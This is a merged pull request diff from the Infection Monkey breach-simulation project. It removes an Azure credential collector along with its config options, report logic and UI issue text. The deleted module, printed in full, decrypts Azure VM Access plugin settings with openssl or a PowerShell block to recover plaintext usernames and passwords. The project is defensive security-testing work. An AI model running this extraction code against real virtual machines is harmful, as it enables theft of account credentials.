Merge pull request #1590 from guardicore/1535-azure-collector-removal
1535 azure collector removal
This commit is contained in:
commit
c3c1b27049
|
@ -97,7 +97,6 @@
|
|||
"lines": [
|
||||
" from common.common_consts.system_info_collectors_names import (",
|
||||
" AWS_COLLECTOR,",
|
||||
" AZURE_CRED_COLLECTOR,",
|
||||
" ENVIRONMENT_COLLECTOR,",
|
||||
"* HOSTNAME_COLLECTOR,",
|
||||
" MIMIKATZ_COLLECTOR,",
|
||||
|
@ -116,8 +115,7 @@
|
|||
" AWS_COLLECTOR,",
|
||||
"* HOSTNAME_COLLECTOR,",
|
||||
" PROCESS_LIST_COLLECTOR,",
|
||||
" MIMIKATZ_COLLECTOR,",
|
||||
" AZURE_CRED_COLLECTOR,"
|
||||
" MIMIKATZ_COLLECTOR,"
|
||||
]
|
||||
},
|
||||
{
|
||||
|
|
|
@ -24,6 +24,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
|||
- Remove serialization of config. #1537
|
||||
- Checkbox that gave the option to not try to first move the dropper file. #1537
|
||||
- Custom singleton mutex name config option. #1589
|
||||
- Azure credential collector, because it was broken (not gathering credentials). #1535
|
||||
|
||||
### Fixed
|
||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||
|
|
|
@ -3,4 +3,3 @@ HOSTNAME_COLLECTOR = "HostnameCollector"
|
|||
ENVIRONMENT_COLLECTOR = "EnvironmentCollector"
|
||||
PROCESS_LIST_COLLECTOR = "ProcessListCollector"
|
||||
MIMIKATZ_COLLECTOR = "MimikatzCollector"
|
||||
AZURE_CRED_COLLECTOR = "AzureCollector"
|
||||
|
|
|
@ -11,7 +11,6 @@
|
|||
"current_server": "192.0.2.0:5000",
|
||||
"alive": true,
|
||||
"collect_system_info": true,
|
||||
"extract_azure_creds": true,
|
||||
"should_use_mimikatz": true,
|
||||
"depth": 2,
|
||||
|
||||
|
|
|
@ -4,9 +4,7 @@ from enum import IntEnum
|
|||
|
||||
import psutil
|
||||
|
||||
from common.common_consts.system_info_collectors_names import AZURE_CRED_COLLECTOR
|
||||
from infection_monkey.network.info import get_host_subnets
|
||||
from infection_monkey.system_info.azure_cred_collector import AzureCollector
|
||||
from infection_monkey.system_info.system_info_collectors_handler import SystemInfoCollectorsHandler
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
@ -63,7 +61,6 @@ class InfoCollector(object):
|
|||
def get_info(self):
|
||||
# Collect all hardcoded
|
||||
self.get_network_info()
|
||||
self.get_azure_info()
|
||||
|
||||
# Collect all plugins
|
||||
SystemInfoCollectorsHandler().execute_all_configured()
|
||||
|
@ -77,35 +74,3 @@ class InfoCollector(object):
|
|||
"""
|
||||
logger.debug("Reading subnets")
|
||||
self.info["network_info"] = {"networks": get_host_subnets()}
|
||||
|
||||
def get_azure_info(self):
|
||||
"""
|
||||
Adds credentials possibly stolen from an Azure VM instance (if we're on one)
|
||||
Updates the credentials structure, creating it if necessary (compat with mimikatz)
|
||||
:return: None. Updates class information
|
||||
"""
|
||||
# noinspection PyBroadException
|
||||
try:
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
if AZURE_CRED_COLLECTOR not in WormConfiguration.system_info_collector_classes:
|
||||
return
|
||||
logger.debug("Harvesting creds if on an Azure machine")
|
||||
azure_collector = AzureCollector()
|
||||
azure_creds = azure_collector.extract_stored_credentials()
|
||||
for cred in azure_creds:
|
||||
username = cred[0]
|
||||
password = cred[1]
|
||||
if username not in self.info["credentials"]:
|
||||
self.info["credentials"][username] = {}
|
||||
# we might be losing passwords in case of multiple reset attempts on same username
|
||||
# or in case another collector already filled in a password for this user
|
||||
self.info["credentials"][username]["password"] = password
|
||||
self.info["credentials"][username]["username"] = username
|
||||
if len(azure_creds) != 0:
|
||||
self.info["Azure"] = {}
|
||||
self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
|
||||
except Exception:
|
||||
# If we failed to collect azure info, no reason to fail all the collection. Log and
|
||||
# continue.
|
||||
logger.error("Failed collecting Azure info.", exc_info=True)
|
||||
|
|
|
@ -1,131 +0,0 @@
|
|||
import glob
|
||||
import json
|
||||
import logging
|
||||
import os.path
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
|
||||
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AzureCollector(object):
|
||||
"""
|
||||
Extract credentials possibly saved on Azure VM instances by the VM Access plugin
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
if sys.platform.startswith("win"):
|
||||
self.path = (
|
||||
"C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings"
|
||||
)
|
||||
self.extractor = AzureCollector.get_pass_windows
|
||||
else:
|
||||
self.path = "/var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config"
|
||||
self.extractor = AzureCollector.get_pass_linux
|
||||
self.file_list = glob.iglob(os.path.join(self.path, "*.settings"))
|
||||
|
||||
def extract_stored_credentials(self):
|
||||
"""
|
||||
Returns a list of username/password pairs saved under configuration files
|
||||
:return: List of (user/pass), possibly empty
|
||||
"""
|
||||
results = [self.extractor(filepath) for filepath in self.file_list]
|
||||
results = [x for x in results if x]
|
||||
logger.info("Found %d Azure VM access configuration file", len(results))
|
||||
return results
|
||||
|
||||
@staticmethod
|
||||
def get_pass_linux(filepath):
|
||||
"""
|
||||
Extract passwords from Linux azure VM Access files
|
||||
:return: Username, password
|
||||
"""
|
||||
linux_cert_store = "/var/lib/waagent/"
|
||||
try:
|
||||
json_data = json.load(open(filepath, "r"))
|
||||
# this is liable to change but seems to be stable over the last year
|
||||
protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"]
|
||||
cert_thumbprint = json_data["runtimeSettings"][0]["handlerSettings"][
|
||||
"protectedSettingsCertThumbprint"
|
||||
]
|
||||
base64_command = """openssl base64 -d -a"""
|
||||
priv_path = os.path.join(linux_cert_store, "%s.prv" % cert_thumbprint)
|
||||
b64_proc = subprocess.Popen(
|
||||
base64_command.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE
|
||||
)
|
||||
b64_result = b64_proc.communicate(input=protected_data + "\n")[0]
|
||||
decrypt_command = "openssl smime -inform DER -decrypt -inkey %s" % priv_path
|
||||
decrypt_proc = subprocess.Popen(
|
||||
decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE
|
||||
)
|
||||
decrypt_raw = decrypt_proc.communicate(input=b64_result)[0]
|
||||
decrypt_data = json.loads(decrypt_raw)
|
||||
T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send()
|
||||
T1064Telem(ScanStatus.USED, "Bash scripts used to extract azure credentials.").send()
|
||||
return decrypt_data["username"], decrypt_data["password"]
|
||||
except IOError:
|
||||
logger.warning("Failed to parse VM Access plugin file. Could not open file")
|
||||
return None
|
||||
except (KeyError, ValueError):
|
||||
logger.warning("Failed to parse VM Access plugin file. Invalid format")
|
||||
return None
|
||||
except subprocess.CalledProcessError:
|
||||
logger.warning(
|
||||
"Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data"
|
||||
)
|
||||
return None
|
||||
|
||||
@staticmethod
|
||||
def get_pass_windows(filepath):
|
||||
"""
|
||||
Extract passwords from Windows azure VM Access files
|
||||
:return: Username,password
|
||||
"""
|
||||
try:
|
||||
json_data = json.load(open(filepath, "r"))
|
||||
# this is liable to change but seems to be stable over the last year
|
||||
protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"]
|
||||
username = json_data["runtimeSettings"][0]["handlerSettings"]["publicSettings"][
|
||||
"UserName"
|
||||
]
|
||||
# we're going to do as much of this in PS as we can.
|
||||
ps_block = ";\n".join(
|
||||
[
|
||||
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
|
||||
"Out-Null",
|
||||
'$base64 = "%s"' % protected_data,
|
||||
"$content = [Convert]::FromBase64String($base64)",
|
||||
"$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",
|
||||
"$env.Decode($content)",
|
||||
"$env.Decrypt()",
|
||||
"$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)",
|
||||
"Write-Host $utf8content", # we want to simplify parsing
|
||||
]
|
||||
)
|
||||
ps_proc = subprocess.Popen(
|
||||
["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE
|
||||
)
|
||||
ps_out = ps_proc.communicate(ps_block)[0]
|
||||
# this is disgusting but the alternative is writing the file to disk...
|
||||
password_raw = ps_out.split("\n")[-2].split(">")[1].split("$utf8content")[1]
|
||||
password = json.loads(password_raw)["Password"]
|
||||
T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send()
|
||||
T1064Telem(
|
||||
ScanStatus.USED, "Powershell scripts used to extract azure credentials."
|
||||
).send()
|
||||
return username, password
|
||||
except IOError:
|
||||
logger.warning("Failed to parse VM Access plugin file. Could not open file")
|
||||
return None
|
||||
except (KeyError, ValueError, IndexError):
|
||||
logger.warning("Failed to parse VM Access plugin file. Invalid format")
|
||||
return None
|
||||
except subprocess.CalledProcessError:
|
||||
logger.warning(
|
||||
"Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data"
|
||||
)
|
||||
return None
|
|
@ -14,7 +14,6 @@ class ConfigSchemaPerAttackTechnique:
|
|||
"T1003": {
|
||||
"System Info Collectors": [
|
||||
"Mimikatz collector",
|
||||
"Azure credential collector"
|
||||
]
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
from common.common_consts.system_info_collectors_names import (
|
||||
AWS_COLLECTOR,
|
||||
AZURE_CRED_COLLECTOR,
|
||||
ENVIRONMENT_COLLECTOR,
|
||||
HOSTNAME_COLLECTOR,
|
||||
MIMIKATZ_COLLECTOR,
|
||||
|
@ -53,13 +52,5 @@ SYSTEM_INFO_COLLECTOR_CLASSES = {
|
|||
"info": "Collects a list of running processes on the machine.",
|
||||
"attack_techniques": ["T1082"],
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [AZURE_CRED_COLLECTOR],
|
||||
"title": "Azure Credential Collector",
|
||||
"safe": True,
|
||||
"info": "Collects password credentials from Azure VMs",
|
||||
"attack_techniques": ["T1003", "T1005"],
|
||||
},
|
||||
],
|
||||
}
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
from common.common_consts.system_info_collectors_names import (
|
||||
AWS_COLLECTOR,
|
||||
AZURE_CRED_COLLECTOR,
|
||||
ENVIRONMENT_COLLECTOR,
|
||||
HOSTNAME_COLLECTOR,
|
||||
MIMIKATZ_COLLECTOR,
|
||||
|
@ -94,7 +93,6 @@ MONKEY = {
|
|||
HOSTNAME_COLLECTOR,
|
||||
PROCESS_LIST_COLLECTOR,
|
||||
MIMIKATZ_COLLECTOR,
|
||||
AZURE_CRED_COLLECTOR,
|
||||
],
|
||||
},
|
||||
},
|
||||
|
|
|
@ -86,7 +86,6 @@ class AWSExporter(Exporter):
|
|||
ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
|
||||
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
|
||||
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
|
||||
# azure and conficker are not relevant issues for an AWS env
|
||||
}
|
||||
|
||||
configured_product_arn = INFECTION_MONKEY_ARN
|
||||
|
|
|
@ -97,24 +97,6 @@ class ReportService:
|
|||
for tunnel in mongo.db.monkey.find({"tunnel": {"$exists": True}}, {"tunnel": 1})
|
||||
]
|
||||
|
||||
@staticmethod
|
||||
def get_azure_issues():
|
||||
creds = ReportService.get_azure_creds()
|
||||
machines = set([instance["origin"] for instance in creds])
|
||||
|
||||
logger.info("Azure issues generated for reporting")
|
||||
|
||||
return [
|
||||
{
|
||||
"type": "azure_password",
|
||||
"machine": machine,
|
||||
"users": set(
|
||||
[instance["username"] for instance in creds if instance["origin"] == machine]
|
||||
),
|
||||
}
|
||||
for machine in machines
|
||||
]
|
||||
|
||||
@staticmethod
|
||||
def get_scanned():
|
||||
formatted_nodes = []
|
||||
|
@ -249,30 +231,6 @@ class ReportService:
|
|||
creds.extend(ssh_keys)
|
||||
return creds
|
||||
|
||||
@staticmethod
|
||||
def get_azure_creds():
|
||||
"""
|
||||
Recover all credentials marked as being from an Azure machine
|
||||
:return: List of credentials.
|
||||
"""
|
||||
creds = []
|
||||
for telem in mongo.db.telemetry.find(
|
||||
{"telem_category": "system_info", "data.Azure": {"$exists": True}},
|
||||
{"data.Azure": 1, "monkey_guid": 1},
|
||||
):
|
||||
azure_users = telem["data"]["Azure"]["usernames"]
|
||||
if len(azure_users) == 0:
|
||||
continue
|
||||
origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"]
|
||||
azure_leaked_users = [
|
||||
{"username": user.replace(",", "."), "type": "Clear Password", "origin": origin}
|
||||
for user in azure_users
|
||||
]
|
||||
creds.extend(azure_leaked_users)
|
||||
|
||||
logger.info("Azure machines creds generated for reporting")
|
||||
return creds
|
||||
|
||||
@staticmethod
|
||||
def process_exploit(exploit) -> ExploiterReportInfo:
|
||||
exploiter_type = exploit["data"]["exploiter"]
|
||||
|
@ -628,7 +586,6 @@ class ReportService:
|
|||
"scanned": scanned_nodes,
|
||||
"exploited_cnt": exploited_cnt,
|
||||
"stolen_creds": ReportService.get_stolen_creds(),
|
||||
"azure_passwords": ReportService.get_azure_creds(),
|
||||
"ssh_keys": ReportService.get_ssh_keys(),
|
||||
"strong_users": PTHReportService.get_strong_users_on_crit_details(),
|
||||
},
|
||||
|
@ -645,7 +602,6 @@ class ReportService:
|
|||
ReportService.get_exploits,
|
||||
ReportService.get_tunnels,
|
||||
ReportService.get_island_cross_segment_issues,
|
||||
ReportService.get_azure_issues,
|
||||
PTHReportService.get_duplicated_passwords_issues,
|
||||
PTHReportService.get_strong_users_on_crit_issues,
|
||||
]
|
||||
|
|
|
@ -43,7 +43,6 @@ import {
|
|||
import {tunnelIssueReport, tunnelIssueOverview} from './security/issues/TunnelIssue';
|
||||
import {stolenCredsIssueOverview} from './security/issues/StolenCredsIssue';
|
||||
import {weakPasswordIssueOverview} from './security/issues/WeakPasswordIssue';
|
||||
import {azurePasswordIssueOverview, azurePasswordIssueReport} from './security/issues/AzurePasswordIssue';
|
||||
import {strongUsersOnCritIssueReport} from './security/issues/StrongUsersOnCritIssue';
|
||||
import {
|
||||
zerologonIssueOverview,
|
||||
|
@ -177,11 +176,6 @@ class ReportPageComponent extends AuthComponent {
|
|||
[this.issueContentTypes.REPORT]: strongUsersOnCritIssueReport,
|
||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||
},
|
||||
'azure_password': {
|
||||
[this.issueContentTypes.OVERVIEW]: azurePasswordIssueOverview,
|
||||
[this.issueContentTypes.REPORT]: azurePasswordIssueReport,
|
||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||
},
|
||||
'weak_password': {
|
||||
[this.issueContentTypes.OVERVIEW]: weakPasswordIssueOverview,
|
||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||
|
|
|
@ -1,23 +0,0 @@
|
|||
import React from 'react';
|
||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
||||
|
||||
export function azurePasswordIssueOverview() {
|
||||
return (<li>Azure machines expose plaintext passwords. (<a
|
||||
href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
|
||||
>More info</a>)</li>)
|
||||
}
|
||||
|
||||
export function azurePasswordIssueReport(issue) {
|
||||
return (
|
||||
<>
|
||||
Delete VM Access plugin configuration files.
|
||||
<CollapsibleWellComponent>
|
||||
Credentials could be stolen from <span
|
||||
className="badge badge-primary">{issue.machine}</span> for the following users <span
|
||||
className="badge badge-primary">{issue.users}</span>. Read more about the security issue and remediation <a
|
||||
href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
|
||||
>here</a>.
|
||||
</CollapsibleWellComponent>
|
||||
</>
|
||||
);
|
||||
}
|
|
@ -162,8 +162,7 @@
|
|||
"awscollector",
|
||||
"hostnamecollector",
|
||||
"processlistcollector",
|
||||
"mimikatzcollector",
|
||||
"azurecollector"
|
||||
"mimikatzcollector"
|
||||
]
|
||||
},
|
||||
"persistent_scanning": {
|
||||
|
|
Loading…
Reference in New Issue